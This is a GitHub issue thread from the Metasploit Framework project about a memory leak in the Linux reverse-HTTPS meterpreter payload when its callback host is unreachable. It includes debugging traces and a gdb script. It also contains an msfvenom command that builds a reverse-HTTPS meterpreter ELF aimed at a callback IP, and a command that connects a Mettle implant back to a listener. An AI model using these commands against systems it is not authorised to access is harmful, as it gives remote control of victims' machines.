Memory leak on linux/meterpreter_reverse_https payload

mnihyc commented 1 year ago

Steps to reproduce

Simply follow the common procedures:

Generate linux/meterpreter_reverse_https payload of ELF file with msfvenom.
Exploit with msfconsole and run meterpreter, the session is established as expected.
Exit msfconsole with exit -y, keep the meterpreter running.

Expected behavior

Meterpreter should be able to reconnect back at any time after msfconsole starts again.

Current behavior

After serveral hours (ranging from ten minutes to half a day in different environments), meterpreter suddenly begins consuming memory at intervals, and eventually OOM killed by OS. I'd observed that memory allocation happens in heap by looking up proc maps. Setting LHOST to localhost seems accelerating this process.

Meanwhile, msfconsole will not receive any requests from meterpreter from then on.

Or in some cases, the connection is received but session can not be established, with the following error recorded:

/opt/metasploit-framework/embedded/framework/lib/rex/proto/http/server.rb:269:in `send_e404'
/opt/metasploit-framework/embedded/framework/lib/rex/proto/http/server.rb:374:in `dispatch_request'
/opt/metasploit-framework/embedded/framework/lib/rex/proto/http/server.rb:303:in `on_client_data'
/opt/metasploit-framework/embedded/framework/lib/rex/proto/http/server.rb:162:in `block in start'
/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/rex-core-0.1.31/lib/rex/io/stream_server.rb:42:in `on_client_data'
/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/rex-core-0.1.31/lib/rex/io/stream_server.rb:185:in `block in monitor_clients'
/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/rex-core-0.1.31/lib/rex/io/stream_server.rb:184:in `each'
/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/rex-core-0.1.31/lib/rex/io/stream_server.rb:184:in `monitor_clients'
/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/rex-core-0.1.31/lib/rex/io/stream_server.rb:64:in `block in start'
/opt/metasploit-framework/embedded/framework/lib/rex/thread_factory.rb:22:in `block in spawn'
/opt/metasploit-framework/embedded/framework/lib/msf/core/thread_manager.rb:105:in `block in spawn'
[09/03/2023 20:46:45] [e(0)] rex: Failed to find handler for resource: /qIuqu9IZXtLvmumYi26kww8cb3ZwjcbaK8Mygu1lIliHX/
[09/03/2023 20:46:45] [e(0)] core: Error in stream server client monitor: undefined method `html_escape' for #<Rex::Proto::Http::Server https://0.0.0.0:8443 [ "/qIuqu9IZXtLvmumYi26QZwqcRKYGYKqPA4adX9K81pBz_MS4mlaS92a4Zny17sy5LWU7n/" ]>
Did you mean?  html_safe?

Documentation

I was trying to make a persistent meterpreter session following the official document, but failed from the very beginning —— Meterpreter itself crashes (due to OOM) before any timeouts could be reached!!

Metasploit version

Newest until now, 6.3.32-dev-

dwelch-r7 commented 1 year ago

Hi @mnihyc thanks for raising this issue, could you let us know what OS target machine was running? also including the output from the debug command in msfconsole even though you're creating the payload with msfvenom it would be nice for us to see all the handler options that have been set

Setting LHOST to localhost seems accelerating this process

This is pretty interesting, I'd need more info to confirm but I suspect localhost is resolving and then retrying quickly and when you're using another LHOST address it's taking longer to resolve (or not resolving at all) and so the loop takes longer but likely isn't the source of the issue anyway but that's just a stab in the dark

mnihyc commented 1 year ago

@dwelch-r7 Hello, thank you for pointing this out. I'm testing with Ubuntu 22.04 x64, and I believe this is an universal issue.

After further diagnosis, I found that memory leak occurs especially when the target accessed by meterpreter is unreachable, that is to say, either LHOST is unreachable, or if LHOST is domain name, the DNS provider is not working. My previous guess about "localhost" appears wrong, and the essential cause are more likely that I'm in poor Internet condition.

Based on this discovery, it would be incredibly simple to trigger the issue: set LHOST to an inaccessible IP, and meterpreter will consume memory for eternity. This can be done without interaction with msfconsole.

A basic example would be: msfvenom -p linux/x64/meterpreter_reverse_https LHOST=9.8.7.6 LPORT=8443 -f elf -o rev

Running the generated program, it can be seen that memory usage keeps increasing rapidly. This also applies for http payload, but not tcp.

Because I'm typically using domains as LHOST, this issue appears critical to me as meterpreter is likely to OOM before DNS change is propagated.

Since the leak happens in heap, I'd set breakpoints on malloc/calloc and obtained some "malicious" call stacks:

#0  0x00007f9893c8af80 in malloc ()
#1  0x00007f9893c8b5a9 in __malloc0 ()
#2  0x00005555574cb368 in ?? ()
#3  0x00007f9893c228e5 in Curl_open ()
#4  0x00007f9893c216fb in curl_easy_init ()
#5  0x00007f9893c48724 in Curl_conncache_init ()
#6  0x00007f9893c31e51 in Curl_multi_handle ()
#7  0x00007f9893c21877 in curl_easy_perform ()
#8  0x00007f9893c0dbec in request ()
#9  0x00007f9893c6f17a in etp_proc ()
#10 0x00007f9893c9cbc2 in start ()
#11 0x0000000000000000 in ?? ()

and

#0  0x00007f9893c8af80 in malloc ()
#1  0x00007f9893c8b5a9 in __malloc0 ()
#2  0x0000555557d028c0 in ?? ()
#3  0x00007f9893c0deee in http_request ()
#4  0x00007f9893c0a4da in http_poll_timer_cb ()
#5  0x00007f9893c707f8 in ev_invoke_pending ()
#6  0x00007f9893c729a9 in ev_run ()
#7  0x00007f9893c09c29 in mettle_start ()
#8  0x00007f9893c08e8e in main ()

Limited to my understanding about source code of meterpreter, I'd suspect it's some "logical error" causing meterpreter to make requests forever without correctly closing them.

adfoster-r7 commented 1 year ago

@mnihyc Interesting! You might be interested in the source code over here too if you were wanting to dig deeper

https://github.com/rapid7/mettle/blob/7274a2413952be0c612fcacf2eb1cc1119c2b840/mettle/src/http_client.c#L205

mnihyc commented 1 year ago

@adfoster-r7 Thank you for letting me know that.

Just to add that, when the memory leaks up to a specific value, like 500M, even if meterpreter is still running, the session can not be established any longer. If this is the first connection, then msfconsole will show endless "Redirecting stageless connection" at rapid speed. Otherwise, msfconsole simply says "session is not valid and will be closed" after seconds and "failed to negotiate TLV encryption" is found in the debug log.

I can believe that the leak is absolutely affecting normal functionality in some way.

github-actions[bot] commented 11 months ago

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

gnusec commented 10 months ago

anyone fix it ? @mnihyc @adfoster-r7

Jemmy1228 commented 10 months ago

@mnihyc @adfoster-r7 @gnusec I spent some time debugging this issue and gained some clues about this bug. My conclusion is that most requests (I mean eio_req) are stuck in the eio_pool in ready state (requests have been submitted but have not yet entered the execution phase)

In general, all the requests would go through http_request() => eio_custom(...) => eio_submit(...), and wait for the task to be dispatched. (Memory is allocated in http_request)

When the request gets dispatched, the function pointer passed to eio_custom will be called i.e. request, and then request(...) will call request_done(...) => http_conn_free(...) to free the allocated memory no matter whether the HTTP request succeded or not.

However, it seems that most requests haven't got dispatched (request is not executed). Of course, request_done and http_conn_free are not called to free the allocated memory either.

I used a gdb command script to debug the generated payload. gdb --command={commandFile} {executable} {executablePid} Here's the command file I used, you may need to change some offsets if it does not work.

  b *(http_request+0x34)
  commands
  printf "http_request() = 0x%016llx\n", $rax
  continue
  end

  b eio_custom
  commands
  printf "submit(0x%016llx)\n", $rcx
  continue
  end

  b *(request+0x5)
  commands
  printf "request(0x%016llx)\n", $rbx
  continue
  end

  b *(request_done+0x5)
  commands
  printf "done(0x%016llx)\n", $rbx
  continue
  end

  b http_conn_free
  commands
  printf "free(0x%016llx)\n", $rdi
  continue
  end

  continue

The output contains a lot of http_request() = 0xXXXXXXXXXXXXXXXX and submit(0xXXXXXXXXXXXXXXXX), which means many eio_reqs are successfully created and submitted to libeio

Only a few request(0xXXXXXXXXXXXXXXXX), done(0xXXXXXXXXXXXXXXXX), free(0xXXXXXXXXXXXXXXXX) are seen in the output, which means most requests are stuck in ready state, but have not yet entered the execution phase.

By viewing the eio_pool variable (the value to be returned by eio_nready()) with gdb, I have confirmed my guess. The eio_pool grows continuously, and the memory consumption increases as the pool gets larger.

But I have no clue how to fix this problem, and don't know how to integrate mettle with msfconsole to check if it is fixed.

adfoster-r7 commented 10 months ago

Thanks for taking a look! :+1:

To build Mettle locally, it should be possible to build it on your host machine or via docker: https://github.com/rapid7/mettle

Once the payload is built, it should output a usable elf file that you can execute directly. iirc it's something similar to:

$ ./build_triple -h
Usage: mettle [options]
  -h, --help             display help
  -u, --uri <uri>        add connection URI
  -U, --uuid <uuid>      set the UUID (base64)
  -d, --debug <level>    enable debug output (set to 0 to disable)
  -o, --out <file>       write debug output to a file
  -b, --background <0|1> start as a background service (0 disable, 1 enable)
  -p, --persist [none|install|uninstall] manage persistence
  -m, --modules <path>   add modules from path
  -n, --name <name>      name to start as
  -l, --listen
  -c, --console

And connecting back to a Metasploit an already running msfconsole listener with the newly built Mettle binary is something like:

./build_triple --debug 3 --uri tcp://x.x.x.x:4444

github-actions[bot] commented 9 months ago

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

adfoster-r7 commented 9 months ago

This is being tracked over here: https://github.com/rapid7/mettle/pull/253

github-actions[bot] commented 8 months ago

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

github-actions[bot] commented 6 months ago

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

github-actions[bot] commented 5 months ago

Hi again!

It’s been 60 days since anything happened on this issue, so we are going to close it. Please keep in mind that I’m only a robot, so if I’ve closed this issue in error please feel free to reopen this issue or create a new one if you need anything else.

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

github-actions[bot] commented 4 months ago

Hi again!

It’s been 60 days since anything happened on this issue, so we are going to close it. Please keep in mind that I’m only a robot, so if I’ve closed this issue in error please feel free to reopen this issue or create a new one if you need anything else.

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

rapid7 / metasploit-framework